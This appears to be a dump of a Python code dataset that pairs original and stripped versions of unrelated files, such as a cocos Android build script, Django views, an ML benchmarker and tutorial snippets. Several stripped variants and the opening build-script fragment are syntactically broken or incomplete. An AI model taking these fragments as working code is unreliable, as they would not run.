            # error) silently falls back to the default toolchain version.
            cocos.Logging.warning("Parse NDK version from file %s failed." % version_file_path)
        cocos.Logging.info("NDK_TOOLCHAIN_VERSION: %s" % ret_version)
        if ret_version == "4.8":
            compile_obj.add_warning_at_end(
                "Your application may crash when using c++ 11 regular expression with NDK_TOOLCHAIN_VERSION %s" % ret_version)
        return ret_version
    def do_ndk_build(self, ndk_build_param, build_mode, compile_obj):
        """Compile the project's native code by invoking ndk-build.

        Args:
            ndk_build_param: extra ndk-build arguments (list), or None.
            build_mode: 'debug' adds NDK_DEBUG=1; anything else is release.
            compile_obj: compile plugin, used to collect toolchain warnings.

        Requires the NDK_ROOT environment variable (and COCOS_X_ROOT /
        COCOS_FRAMEWORKS when the module paths reference those templates).
        """
        cocos.Logging.info('NDK build mode: %s' % build_mode)
        ndk_root = cocos.check_environment_variable('NDK_ROOT')
        toolchain_version = self.get_toolchain_version(ndk_root, compile_obj)
        app_android_root = self.app_android_root
        # NOTE(review): reload(sys)/setdefaultencoding is a Python-2-only
        # hack to tolerate non-ASCII paths; it has no Python-3 equivalent.
        reload(sys)
        sys.setdefaultencoding('utf8')
        ndk_path = os.path.join(ndk_root, "ndk-build")
        # Expand ${ENGINE_ROOT}/${COCOS_FRAMEWORKS} placeholders from
        # build-cfg.json into absolute NDK module paths.
        module_paths = []
        for cfg_path in self.ndk_module_paths:
            if cfg_path.find("${ENGINE_ROOT}") >= 0:
                cocos_root = cocos.check_environment_variable("COCOS_X_ROOT")
                module_paths.append(cfg_path.replace("${ENGINE_ROOT}", cocos_root))
            elif cfg_path.find("${COCOS_FRAMEWORKS}") >= 0:
                cocos_frameworks = cocos.check_environment_variable("COCOS_FRAMEWORKS")
                module_paths.append(cfg_path.replace("${COCOS_FRAMEWORKS}", cocos_frameworks))
            else:
                module_paths.append(os.path.join(app_android_root, cfg_path))
        # delete template static and dynamic files
        obj_local_dir = os.path.join(self.app_android_root, "obj", "local")
        if os.path.isdir(obj_local_dir):
            for abi_dir in os.listdir(obj_local_dir):
                static_file_path = os.path.join(self.app_android_root, "obj", "local", abi_dir)
                if os.path.isdir(static_file_path):
                    self.remove_c_libs(static_file_path)
        # windows should use ";" to seperate module paths
        if cocos.os_is_win32():
            ndk_module_path = ';'.join(module_paths)
        else:
            ndk_module_path = ':'.join(module_paths)
        ndk_module_path= 'NDK_MODULE_PATH=' + ndk_module_path
        if ndk_build_param is None:
            ndk_build_cmd = '%s -C %s %s' % (ndk_path, app_android_root, ndk_module_path)
        else:
            ndk_build_cmd = '%s -C %s %s %s' % (ndk_path, app_android_root, ' '.join(ndk_build_param), ndk_module_path)
        ndk_build_cmd = '%s NDK_TOOLCHAIN_VERSION=%s' % (ndk_build_cmd, toolchain_version)
        if build_mode == 'debug':
            ndk_build_cmd = '%s NDK_DEBUG=1' % ndk_build_cmd
        self._run_cmd(ndk_build_cmd)
def _xml_attr(self, dir, file_name, node_name, attr):
doc = minidom.parse(os.path.join(dir, file_name))
return doc.getElementsByTagName(node_name)[0].getAttribute(attr)
    def update_lib_projects(self, sdk_root, sdk_tool_path, android_platform):
        """Run ``android update lib-project`` for each referenced library project.

        Library projects are discovered from the
        ``android.library.reference.N=<path>`` lines of project.properties;
        missing files/directories are skipped silently.
        """
        property_file = os.path.join(self.app_android_root, "project.properties")
        if not os.path.isfile(property_file):
            return
        patten = re.compile(r'^android\.library\.reference\.[\d]+=(.+)')
        for line in open(property_file):
            # Strip all whitespace so "key = value" still matches.
            str1 = line.replace(' ', '')
            str2 = str1.replace('\t', '')
            match = patten.match(str2)
            if match is not None:
                # a lib project is found
                lib_path = match.group(1)
                abs_lib_path = os.path.join(self.app_android_root, lib_path)
                if os.path.isdir(abs_lib_path):
                    # auto_select=True: pick a compatible platform per library.
                    target_str = self.check_android_platform(sdk_root, android_platform, abs_lib_path, True)
                    command = "%s update lib-project -p %s -t %s" % (cocos.CMDRunner.convert_path_to_cmd(sdk_tool_path), abs_lib_path, target_str)
                    self._run_cmd(command)
    def select_default_android_platform(self, min_api_level):
        """Select a default android platform from ANDROID_SDK_ROOT.

        Scans the SDK's ``platforms`` directory and returns the directory
        name (e.g. "android-19") with the smallest API level that is still
        >= *min_api_level*, or None when no installed platform qualifies.
        """
        sdk_root = cocos.check_environment_variable('ANDROID_SDK_ROOT')
        platforms_dir = os.path.join(sdk_root, "platforms")
        ret_num = -1
        ret_platform = ""
        if os.path.isdir(platforms_dir):
            for dir_name in os.listdir(platforms_dir):
                if not os.path.isdir(os.path.join(platforms_dir, dir_name)):
                    continue
                num = self.get_api_level(dir_name, raise_error=False)
                if num >= min_api_level:
                    # Keep the lowest qualifying API level seen so far.
                    if ret_num == -1 or ret_num > num:
                        ret_num = num
                        ret_platform = dir_name
        if ret_num != -1:
            return ret_platform
        else:
            return None
def get_api_level(self, target_str, raise_error=True):
special_targats_info = {
"android-4.2" : 17,
"android-L" : 20
}
if special_targats_info.has_key(target_str):
ret = special_targats_info[target_str]
else:
match = re.match(r'android-(\d+)', target_str)
if match is not None:
ret = int(match.group(1))
else:
if raise_error:
raise cocos.CCPluginError("%s is not a valid android target platform." % target_str)
else:
ret = -1
return ret
def get_target_config(self, proj_path):
property_file = os.path.join(proj_path, "project.properties")
if not os.path.isfile(property_file):
raise cocos.CCPluginError("Can't find file \"%s\"" % property_file)
patten = re.compile(r'^target=(.+)')
for line in open(property_file):
str1 = line.replace(' ', '')
str2 = str1.replace('\t', '')
match = patten.match(str2)
if match is not None:
target = match.group(1)
target_num = self.get_api_level(target)
if target_num > 0:
return target_num
raise cocos.CCPluginError("Can't find \"target\" in file \"%s\"" % property_file)
    # check the selected android platform
    def check_android_platform(self, sdk_root, android_platform, proj_path, auto_select):
        """Validate (or choose) the android platform for a project.

        Ensures the chosen platform's API level meets the project's minimum
        (from project.properties) and that the platform directory actually
        exists in the SDK.

        Args:
            sdk_root: Android SDK root directory.
            android_platform: requested "android-N" name, or None to search.
            proj_path: project directory (used for its minimum target).
            auto_select: if the requested platform is too low, pick a valid
                one automatically instead of raising.

        Returns:
            str: a usable platform name (e.g. "android-17").

        Raises:
            cocos.CCPluginError: when no suitable platform can be found.
        """
        ret = android_platform
        min_platform = self.get_target_config(proj_path)
        if android_platform is None:
            # not specified platform, found one
            cocos.Logging.info('Android platform not specified, searching a default one...')
            ret = self.select_default_android_platform(min_platform)
        else:
            # check whether it's larger than min_platform
            select_api_level = self.get_api_level(android_platform)
            if select_api_level < min_platform:
                if auto_select:
                    # select one for project
                    ret = self.select_default_android_platform(min_platform)
                else:
                    # raise error
                    raise cocos.CCPluginError("The android-platform of project \"%s\" should be equal/larger than %d, but %d is specified." % (proj_path, min_platform, select_api_level))
        if ret is None:
            raise cocos.CCPluginError("Can't find right android-platform for project : \"%s\". The android-platform should be equal/larger than %d" % (proj_path, min_platform))
        ret_path = os.path.join(cocos.CMDRunner.convert_path_to_python(sdk_root), "platforms", ret)
        if not os.path.isdir(ret_path):
            raise cocos.CCPluginError("The directory \"%s\" can't be found in android SDK" % ret)
        # Map irregular platform directory names to their canonical form.
        special_platforms_info = {
            "android-4.2" : "android-17"
        }
        # NOTE(review): dict.has_key() is Python-2-only; use "in" for Python 3.
        if special_platforms_info.has_key(ret):
            ret = special_platforms_info[ret]
        return ret
    def do_build_apk(self, sdk_root, ant_root, build_mode, output_dir, custom_step_args, compile_obj):
        """Package the APK with ant and copy it into *output_dir*.

        Steps: copy resources into assets/, compile lua/js scripts, gather
        signing info for release builds, run pre/post custom steps around
        ``ant clean <mode>``, then move the generated APK to *output_dir*
        (release APKs are renamed ``<name>-release-signed.apk``).

        Returns:
            str: path of the final APK inside *output_dir*.

        Raises:
            cocos.CCPluginError: if *output_dir* was not specified.
        """
        app_android_root = self.app_android_root
        # copy resources
        self._copy_resources(custom_step_args)
        # check the project config & compile the script files
        assets_dir = os.path.join(app_android_root, "assets")
        if self._project._is_lua_project():
            compile_obj.compile_lua_scripts(assets_dir, assets_dir)
        if self._project._is_js_project():
            compile_obj.compile_js_scripts(assets_dir, assets_dir)
        # gather the sign info if necessary
        if build_mode == "release" and not self.has_keystore_in_antprops():
            self._gather_sign_info()
        # run ant build
        ant_path = os.path.join(ant_root, 'ant')
        buildfile_path = os.path.join(app_android_root, "build.xml")
        # generate paramters for custom step
        args_ant_copy = custom_step_args.copy()
        target_platform = cocos_project.Platforms.ANDROID
        # invoke custom step: pre-ant-build
        self._project.invoke_custom_step_script(cocos_project.Project.CUSTOM_STEP_PRE_ANT_BUILD, target_platform, args_ant_copy)
        command = "%s clean %s -f %s -Dsdk.dir=%s" % (cocos.CMDRunner.convert_path_to_cmd(ant_path), build_mode, buildfile_path, cocos.CMDRunner.convert_path_to_cmd(sdk_root))
        self._run_cmd(command)
        # invoke custom step: post-ant-build
        self._project.invoke_custom_step_script(cocos_project.Project.CUSTOM_STEP_POST_ANT_BUILD, target_platform, args_ant_copy)
        if output_dir:
            # The APK name comes from the ant project name in build.xml.
            project_name = self._xml_attr(app_android_root, 'build.xml', 'project', 'name')
            apk_name = '%s-%s.apk' % (project_name, build_mode)
            #TODO 'bin' is hardcoded, take the value from the Ant file
            gen_apk_path = os.path.join(app_android_root, 'bin', apk_name)
            if not os.path.exists(output_dir):
                os.makedirs(output_dir)
            shutil.copy(gen_apk_path, output_dir)
            cocos.Logging.info("Move apk to %s" % output_dir)
            if build_mode == "release":
                # Rename to "-signed" so the artifact name reflects signing.
                signed_name = "%s-%s-signed.apk" % (project_name, build_mode)
                apk_path = os.path.join(output_dir, signed_name)
                if os.path.exists(apk_path):
                    os.remove(apk_path)
                os.rename(os.path.join(output_dir, apk_name), apk_path)
            else:
                apk_path = os.path.join(output_dir, apk_name)
            return apk_path
        else:
            raise cocos.CCPluginError("Not specified the output directory!")
def _gather_sign_info(self):
    """Interactively collect keystore signing settings for a release build
    and persist them into ant.properties via _write_ant_properties().

    (Method of the Android builder class; Python 2 code.)
    """
    sign_cfg = {}
    # Keep prompting until the user supplies a path that resolves to an
    # existing keystore file; relative paths resolve against the project
    # android root, but the value stored is the string the user typed.
    while True:
        typed = self._get_user_input("Please input the absolute/relative path of \".keystore\" file:").strip()
        resolved = typed if os.path.isabs(typed) else os.path.join(self.app_android_root, typed)
        if os.path.isfile(resolved):
            sign_cfg["key.store"] = typed
            break
        cocos.Logging.warning("The string inputed is not a file!")
    # The remaining signing values are taken verbatim from the user.
    sign_cfg["key.alias"] = self._get_user_input("Please input the alias:")
    sign_cfg["key.store.password"] = self._get_user_input("Please input the password of key store:")
    sign_cfg["key.alias.password"] = self._get_user_input("Please input the password of alias:")
    # write the config into ant.properties
    self._write_ant_properties(sign_cfg)
def _get_user_input(self, tip_msg):
    """Display *tip_msg* as a warning prompt, then return one line typed
    by the user (Python 2 ``raw_input``, trailing newline stripped)."""
    cocos.Logging.warning(tip_msg)
    # The original wrapped this read in a single-iteration loop; a direct
    # return is equivalent.
    return raw_input()
def _copy_resources(self, custom_step_args):
    """Rebuild the Android "assets" directory from the project resources.

    Deletes any existing assets dir, recreates it, then copies every
    resource config listed in ``self.res_files`` into it, invoking the
    project's pre/post copy-assets custom-step scripts around the copy.
    (Method of the Android builder class; Python 2 code.)
    """
    app_android_root = self.app_android_root
    res_files = self.res_files
    # remove app_android_root/assets if it exists
    assets_dir = os.path.join(app_android_root, "assets")
    if os.path.isdir(assets_dir):
        shutil.rmtree(assets_dir)
    # generate parameters for custom steps
    target_platform = cocos_project.Platforms.ANDROID
    cur_custom_step_args = custom_step_args.copy()
    cur_custom_step_args["assets-dir"] = assets_dir
    # make dir
    os.mkdir(assets_dir)
    # invoke custom step : pre copy assets
    self._project.invoke_custom_step_script(cocos_project.Project.CUSTOM_STEP_PRE_COPY_ASSETS, target_platform, cur_custom_step_args)
    # copy resources
    for cfg in res_files:
        cocos.copy_files_with_config(cfg, app_android_root, assets_dir)
    # invoke custom step : post copy assets
    self._project.invoke_custom_step_script(cocos_project.Project.CUSTOM_STEP_POST_COPY_ASSETS, target_platform, cur_custom_step_args)
| 17,491 | 1,713 | 23 |
df8f8127a729283da8ae42c9a26f1ef82d99e21a | 190 | py | Python | atest/testdata/test_libraries/ClassWithNotKeywordDecorator.py | rdagum/robotframework | b7069d505374e9f09a140ed5a9727d2a40716446 | [
"ECL-2.0",
"Apache-2.0"
] | 7,073 | 2015-01-01T17:19:16.000Z | 2022-03-31T22:01:29.000Z | atest/testdata/test_libraries/ClassWithNotKeywordDecorator.py | imust6226/robotframework | 08c56fef2ebc64d682c7f99acd77c480d8d0e028 | [
"ECL-2.0",
"Apache-2.0"
] | 2,412 | 2015-01-02T09:29:05.000Z | 2022-03-31T13:10:46.000Z | atest/testdata/test_libraries/ClassWithNotKeywordDecorator.py | 3mdeb/robotframework | 6006ce0b3d5fc6b45c5eb040dc859acd64bfa846 | [
"ECL-2.0",
"Apache-2.0"
] | 2,298 | 2015-01-03T02:47:15.000Z | 2022-03-31T02:00:16.000Z | from robot.api.deco import not_keyword
| 15.833333 | 38 | 0.710526 | from robot.api.deco import not_keyword
class ClassWithNotKeywordDecorator:
    # Robot Framework acceptance-test data: `exposed_in_class` must be
    # discovered as a keyword, while `not_exposed_in_class` must be hidden
    # by the @not_keyword decorator. Intentionally minimal — do not add
    # docstrings here, they would become keyword documentation.
    def exposed_in_class(self):
        pass
    @not_keyword
    def not_exposed_in_class(self):
        pass
| 42 | 85 | 23 |
a15b4093e656e40e94de6847d3082d5d816ef4dd | 164 | py | Python | WEEKS/CD_Sata-Structures/_MISC/misc-examples/tuples.py | webdevhub42/Lambda | b04b84fb5b82fe7c8b12680149e25ae0d27a0960 | [
"MIT"
] | null | null | null | WEEKS/CD_Sata-Structures/_MISC/misc-examples/tuples.py | webdevhub42/Lambda | b04b84fb5b82fe7c8b12680149e25ae0d27a0960 | [
"MIT"
] | null | null | null | WEEKS/CD_Sata-Structures/_MISC/misc-examples/tuples.py | webdevhub42/Lambda | b04b84fb5b82fe7c8b12680149e25ae0d27a0960 | [
"MIT"
] | null | null | null | l1 = [1, 3, 5, 7, 9] # list mutable (read write)
t1 = (1, 3, 5, 7, 9) # tuple imutable (read only)
f(l1)
print(l1)
f(t1)
print(t1)
| 12.615385 | 50 | 0.542683 | l1 = [1, 3, 5, 7, 9] # list mutable (read write)
t1 = (1, 3, 5, 7, 9) # tuple imutable (read only)
def f(x):
x.append(29)
f(l1)
print(l1)
f(t1)
print(t1)
| 5 | 0 | 23 |
bc2349ff8bae24f07701d461a1fd2e888e76d0b2 | 1,629 | py | Python | stereo/dataset/DS.py | Owl-AI/Reversing | a4321642ccad6e7c2f4c71bcb960ee9c5edf5ed8 | [
"Apache-2.0"
] | 41 | 2020-07-06T13:02:44.000Z | 2022-03-23T04:39:19.000Z | stereo/dataset/DS.py | Owl-AI/Reversing | a4321642ccad6e7c2f4c71bcb960ee9c5edf5ed8 | [
"Apache-2.0"
] | 19 | 2020-09-23T18:40:29.000Z | 2022-02-10T02:05:39.000Z | stereo/dataset/DS.py | Owl-AI/Reversing | a4321642ccad6e7c2f4c71bcb960ee9c5edf5ed8 | [
"Apache-2.0"
] | 6 | 2020-12-03T09:49:58.000Z | 2022-02-18T12:18:34.000Z | # Copyright 2020 Filippo Aleotti, Fabio Tosi, Li Zhang, Matteo Poggi, Stefano Mattoccia
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from dataset import KITTI
def load_from_file_test(filepath, rgb_ext):
    """Read a filename file and collect the stereo test pairs it lists.

    Args:
        filepath: path to filename file
        rgb_ext: extension of RGB images
    Return:
        left_test: list of paths to left images
        right_test: list of paths to right images
    """
    with open(filepath) as handle:
        # One "left right" pair per line in the filename file.
        pairs = [_load_samples_test(entry, rgb_ext) for entry in handle.readlines()]
    if not pairs:
        return [], []
    left_test, right_test = (list(side) for side in zip(*pairs))
    return left_test, right_test
def _load_samples_test(line, rgb_ext):
    """Parse one "left right" line into a pair of image paths.

    Args:
        line: line to load
        rgb_ext: extension of RGB image
    Return:
        left: path to the left image
        right: path to the right image
    """
    left_raw, right_raw = line.replace("\n", "").split(" ")
    left = KITTI.set_extension(left_raw, rgb_ext)
    right = KITTI.set_extension(right_raw, rgb_ext)
    return left, right
| 29.618182 | 87 | 0.679558 | # Copyright 2020 Filippo Aleotti, Fabio Tosi, Li Zhang, Matteo Poggi, Stefano Mattoccia
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from dataset import KITTI
def load_from_file_test(filepath, rgb_ext):
    """Load testing images.
    Args:
        filepath: path to filename file
        rgb_ext: extension of RGB images
    Return:
        left_test: list of paths to left images
        right_test: list of paths to right images
    """
    left_test = []
    right_test = []
    with open(filepath) as f:
        lines = f.readlines()
        # one "left right" pair per line in the filename file
        for line in lines:
            left, right = _load_samples_test(line, rgb_ext)
            left_test.append(left)
            right_test.append(right)
    return left_test, right_test
"""Load samples in line.
Args:
line: line to load
rgb_ext: extension of RGB image
Return:
left: list of paths to left images
right: list of paths to right images
"""
left, right = line.replace("\n", "").split(" ")
left, right = [KITTI.set_extension(x, rgb_ext) for x in [left, right]]
return left, right
| 0 | 0 | 0 |
ee9ed6c949b34da36c66762654aacec08e5ca418 | 1,009 | py | Python | scc_home/views.py | supercooledcreations/supercooledcreations | e4fcbbfd1eb60d808273d16c1de0ffb81ac33e49 | [
"MIT"
] | null | null | null | scc_home/views.py | supercooledcreations/supercooledcreations | e4fcbbfd1eb60d808273d16c1de0ffb81ac33e49 | [
"MIT"
] | null | null | null | scc_home/views.py | supercooledcreations/supercooledcreations | e4fcbbfd1eb60d808273d16c1de0ffb81ac33e49 | [
"MIT"
] | null | null | null | # Import #
# Django
from django.contrib.auth.mixins import LoginRequiredMixin
from django.http import HttpResponseRedirect
from django.shortcuts import render
from django.views import View
from django.urls import reverse
from django.utils import timezone
# App
from .forms import BookmarkForm
from .models import Bookmark
# Views #
# Metrics #
# List, Add | 24.609756 | 66 | 0.693756 | # Import #
# Django
from django.contrib.auth.mixins import LoginRequiredMixin
from django.http import HttpResponseRedirect
from django.shortcuts import render
from django.views import View
from django.urls import reverse
from django.utils import timezone
# App
from .forms import BookmarkForm
from .models import Bookmark
# Views #
# Metrics #
class HomeView(LoginRequiredMixin, View):
    """Landing page: lists the current user's bookmarks and accepts new ones."""

    def get(self, request, *args, **kwargs):
        # Show only this user's bookmarks together with the (unbound) add form.
        context = {
            'bookmark_list': Bookmark.objects.filter(user=request.user),
            'bookmark_form': BookmarkForm,
        }
        return render(request, 'scc_home/home.html', context)

    def post(self, request, *args, **kwargs):
        # Attach the submitted bookmark to the requesting user before saving.
        form = BookmarkForm(request.POST)
        form.instance.user = request.user
        if form.is_valid():
            form.save()
        # Redirect-after-POST; an invalid submission is silently discarded.
        return HttpResponseRedirect(reverse('scc_home:home'))
35580bce47e7ce13de691232e814794292ae6419 | 4,100 | py | Python | Engine/src/simulation/benchmarker/model_benchmarker.py | xapharius/HadoopML | c0129f298007ca89b538eb1a3800f991141ba361 | [
"MIT"
] | 2 | 2018-02-05T12:41:31.000Z | 2018-11-23T04:13:13.000Z | Engine/src/simulation/benchmarker/model_benchmarker.py | xapharius/HadoopML | c0129f298007ca89b538eb1a3800f991141ba361 | [
"MIT"
] | null | null | null | Engine/src/simulation/benchmarker/model_benchmarker.py | xapharius/HadoopML | c0129f298007ca89b538eb1a3800f991141ba361 | [
"MIT"
] | null | null | null | '''
Created on Apr 21, 2015
@author: xapharius
'''
import numpy as np
import pandas as pd
from datahandler.numerical2.numerical_data_handler import NumericalDataHandler
from sklearn.linear_model.logistic import LogisticRegression
from factory.algorithm_factory import AlgorithmFactory
from factory.homogenous_factory import HomogenousFactory
from simulation.sampler.bootstrap_sampler import BootstrapSampler
import simulation.benchmarker.dataset_loader as loader
from simulation.mr_simulator.ensemble_simulator import EnsembleSimulator
from ensemble.classification.weighted_bag import WBag
from validator.classification_validator import ClassificationValidator
from simulation.mr_simulator.wbag_simulator import WBagSimulator
class ModelBenchmarker(object):
    '''
    Class for running a comparison
    !!! Two meta-parameters for experiment: nr_mappers of simulation and sample_size_ratio for sampler
    '''
    def __init__(self, data_type="numerical", sampler=BootstrapSampler(),
                 simulator=WBagSimulator, nr_mappers=10):
        '''
        Constructor - Defining an experiment/environment setting
        in order to then benchmark different models
        @param data_type: kind of datasets to load (e.g. "numerical")
        @param sampler: unbound sampler; its sample_size_ratio is set to
            1/nr_mappers so each mapper sees an equal share of the data
        @param simulator: simulator class used to train the ensemble
        @param nr_mappers: number of mappers simulator should use
        '''
        # NOTE(review): the default sampler/BootstrapSampler() instance is
        # created once at class-definition time and shared across calls that
        # rely on the default — TODO confirm intended.
        self.data_type = data_type
        self.nr_mappers = nr_mappers
        self.sampler = sampler
        self.sampler.sample_size_ratio = 1. / nr_mappers
        # iterable of RawDataset
        self.datasets = loader.get_datasets(data_type=self.data_type)
        self.simulator = simulator
| 42.708333 | 129 | 0.706098 | '''
Created on Apr 21, 2015
@author: xapharius
'''
import numpy as np
import pandas as pd
from datahandler.numerical2.numerical_data_handler import NumericalDataHandler
from sklearn.linear_model.logistic import LogisticRegression
from factory.algorithm_factory import AlgorithmFactory
from factory.homogenous_factory import HomogenousFactory
from simulation.sampler.bootstrap_sampler import BootstrapSampler
import simulation.benchmarker.dataset_loader as loader
from simulation.mr_simulator.ensemble_simulator import EnsembleSimulator
from ensemble.classification.weighted_bag import WBag
from validator.classification_validator import ClassificationValidator
from simulation.mr_simulator.wbag_simulator import WBagSimulator
class ModelBenchmarker(object):
    '''
    Class for running a comparison
    !!! Two meta-parameters for experiment: nr_mappers of simulation and sample_size_ratio for sampler
    '''
    def __init__(self, data_type="numerical", sampler=BootstrapSampler(),
                 simulator=WBagSimulator, nr_mappers=10):
        '''
        Constructor - Defining an experiment/environment setting
        in order to then benchmark different models
        @param data_type: kind of datasets to load (e.g. "numerical")
        @param sampler: unbound sampler; its sample_size_ratio is set to
            1/nr_mappers so each mapper sees an equal share of the data
        @param simulator: simulator class used to train the ensemble
        @param nr_mappers: number of mappers simulator should use
        '''
        self.data_type = data_type
        self.nr_mappers = nr_mappers
        self.sampler = sampler
        self.sampler.sample_size_ratio = 1. / nr_mappers
        # iterable of RawDataset
        self.datasets = loader.get_datasets(data_type=self.data_type)
        self.simulator = simulator
    def benchmark(self, manager_factory):
        '''
        For every dataset: train a WBag ensemble via the simulator, train a
        single benchmark model from manager_factory on the full data, and
        validate both on the validation split.  (Python 2 code.)
        @param manager_factory: factory producing model managers
        @return: (results_change, results_all) — per-dataset relative change
            of the ensemble vs the benchmark, and raw metric rows for both
        '''
        results_all = pd.DataFrame()
        results_change = pd.DataFrame()
        for rawdataset in self.datasets:
            print "\n\nDataset={} (n={}), input_dim={}, label_dim={}"\
                .format(rawdataset.name, rawdataset.total_obs, rawdataset.input_var, rawdataset.target_var)
            self.sampler.bind_data(rawdataset.training_inputs, rawdataset.training_targets)
            # simulation - train ensemble
            simulator = self.simulator(data_sampler=self.sampler,
                                       factory=manager_factory, ensemble_cls=WBag)
            ensemble = simulator.simulate(nr_mappers=self.nr_mappers)
            print "Number of Features per Model:", [manager.feature_engineer.number_of_features for manager in ensemble.managers]
            print "Training Obs per model", [manager.training_data_statistics["nr_obs"] for manager in ensemble.managers]
            print "Ensemble Weights", ['%.4f' % weight for weight in ensemble.weights]
            print "Params per Model:"
            for manager in ensemble.managers:
                print manager.model.get_params()
            # train benchmark model (all features, full training split)
            benchmark_model = manager_factory.get_instance()
            benchmark_model.feature_engineer.random_subset_of_features_ratio = 1
            benchmark_model.train(rawdataset.training_inputs, rawdataset.training_targets)
            # validate both
            validator = ClassificationValidator()
            ensemble_results = validator.validate(ensemble, rawdataset.validation_inputs, rawdataset.validation_targets)
            benchmark_results = validator.validate(benchmark_model, rawdataset.validation_inputs, rawdataset.validation_targets)
            # append to results list/dataframe ("_b" = benchmark, "_e" = ensemble)
            df_b = pd.DataFrame(benchmark_results, index=[rawdataset.name+"_b"])
            df_e = pd.DataFrame(ensemble_results, index=[rawdataset.name+"_e"])
            results_all = pd.concat([results_all, df_b, df_e])
            # relative change of each metric: ensemble/benchmark - 1
            change = (df_e.reset_index(drop=True) / df_b.reset_index(drop=True)) - 1
            change.index=[rawdataset.name]
            results_change = pd.concat([results_change, change])
        return results_change, results_all
| 2,226 | 0 | 27 |
805a04eab2c89b61a881966d193f53c1ab24ddc7 | 243 | py | Python | acf_example/httpbin_client/actions/status.py | Jamim/acf | af7ebd9af7c4cd8bf977ddcb51f297107ba3fcbc | [
"MIT"
] | 5 | 2018-11-15T13:35:53.000Z | 2022-02-23T06:43:13.000Z | acf_example/httpbin_client/actions/status.py | Jamim/acf | af7ebd9af7c4cd8bf977ddcb51f297107ba3fcbc | [
"MIT"
] | 4 | 2018-12-15T23:56:35.000Z | 2018-12-19T05:48:42.000Z | acf_example/httpbin_client/actions/status.py | Jamim/acf | af7ebd9af7c4cd8bf977ddcb51f297107ba3fcbc | [
"MIT"
] | 4 | 2018-11-15T13:36:02.000Z | 2022-02-23T06:43:14.000Z | from ..wrappers.status import UpdateStatusResultWrapper
from .base import HttpbinAction
| 22.090909 | 55 | 0.765432 | from ..wrappers.status import UpdateStatusResultWrapper
from .base import HttpbinAction
class UpdateStatusAction(HttpbinAction):
METHOD = 'PUT'
URL_COMPONENTS = ('status', '{status}')
RESULT_WRAPPER = UpdateStatusResultWrapper
| 0 | 131 | 23 |
dd650dd25a31e2850c06900e6356f7ef7f9c2098 | 928 | py | Python | ch06/06_06_fav-langs.py | remotephone/pythoncrashcourse | 837d05c5ef4976621bd2206328254749a71d60ff | [
"Apache-2.0"
] | null | null | null | ch06/06_06_fav-langs.py | remotephone/pythoncrashcourse | 837d05c5ef4976621bd2206328254749a71d60ff | [
"Apache-2.0"
] | null | null | null | ch06/06_06_fav-langs.py | remotephone/pythoncrashcourse | 837d05c5ef4976621bd2206328254749a71d60ff | [
"Apache-2.0"
] | null | null | null | favorite_languages = {
'jen': 'python',
'sarah': 'c',
'edward': 'ruby',
'phil': 'python',
}
for name, language in favorite_languages.items():
print(name.title() + "'s favorite language is " +
language.title() + ".")
for name in favorite_languages.keys():
print(name.title())
friends = ['phil', 'sarah']
for name in favorite_languages.keys():
print(name.title())
if name in friends:
print(" Hi " + name.title() +
", I see your favorite language is " +
favorite_languages[name].title() + "!")
if 'erin' not in favorite_languages.keys():
print("Erin, please take our poll!")
print("The following languages have been mentioned:")
for language in favorite_languages.values():
print(language.title())
print("These languages have been mentioned at least once:")
for language in set(favorite_languages.values()):
print(language.title())
| 25.777778 | 59 | 0.636853 | favorite_languages = {
'jen': 'python',
'sarah': 'c',
'edward': 'ruby',
'phil': 'python',
}
for name, language in favorite_languages.items():
print(name.title() + "'s favorite language is " +
language.title() + ".")
for name in favorite_languages.keys():
print(name.title())
friends = ['phil', 'sarah']
for name in favorite_languages.keys():
print(name.title())
if name in friends:
print(" Hi " + name.title() +
", I see your favorite language is " +
favorite_languages[name].title() + "!")
if 'erin' not in favorite_languages.keys():
print("Erin, please take our poll!")
print("The following languages have been mentioned:")
for language in favorite_languages.values():
print(language.title())
print("These languages have been mentioned at least once:")
for language in set(favorite_languages.values()):
print(language.title())
| 0 | 0 | 0 |
1ac9df902aa5e4f7697bbdceacd57712c28d228c | 15,340 | py | Python | python/dsbox/JobManager/DistributedJobManager.py | usc-isi-i2/dsbox-ta2 | 85e0e8f5bbda052fa77cb98f4eef1f4b50909fd2 | [
"MIT"
] | 7 | 2018-05-10T22:19:44.000Z | 2020-07-21T07:28:39.000Z | python/dsbox/JobManager/DistributedJobManager.py | usc-isi-i2/dsbox-ta2 | 85e0e8f5bbda052fa77cb98f4eef1f4b50909fd2 | [
"MIT"
] | 187 | 2018-04-13T17:19:24.000Z | 2020-04-21T00:41:15.000Z | python/dsbox/JobManager/DistributedJobManager.py | usc-isi-i2/dsbox-ta2 | 85e0e8f5bbda052fa77cb98f4eef1f4b50909fd2 | [
"MIT"
] | 7 | 2018-07-10T00:14:07.000Z | 2019-07-25T17:59:44.000Z | import copy
import os
import logging
import pickle
import psutil
import time
import threading
import typing
from enum import Enum
from math import ceil
from multiprocessing import Pool, Queue, Manager, current_process
from threading import Timer
# Module-level logger shared by this file.
_logger = logging.getLogger(__name__)
# used to save all PID of workers created
# NOTE(review): Manager() is created at import time, which spawns a manager
# server process as an import side effect — confirm intended.
m = Manager()
_current_work_pids = m.list()
class WorkerQueueHandler(logging.handlers.QueueHandler):
    '''
    Adds process name to log records
    '''
    # NOTE(review): this file only does `import logging`; `logging.handlers`
    # may not be loaded when this class body executes — confirm that some
    # other module imports logging.handlers first, or import it explicitly.
    # (The method bodies were stripped from this copy; only the commented
    # debug hooks below remain.)
    # def emit(self, record):
    #     print('emit:', record)
    #     return super().emit(record)
    # def enqueue(self, record):
    #     print('enqueue:', record)
    #     return super().enqueue(record)
| 35.591647 | 110 | 0.585854 | import copy
import os
import logging
import pickle
import psutil
import time
import threading
import typing
from enum import Enum
from math import ceil
from multiprocessing import Pool, Queue, Manager, current_process
from threading import Timer
# Module-level logger shared by this file.
_logger = logging.getLogger(__name__)
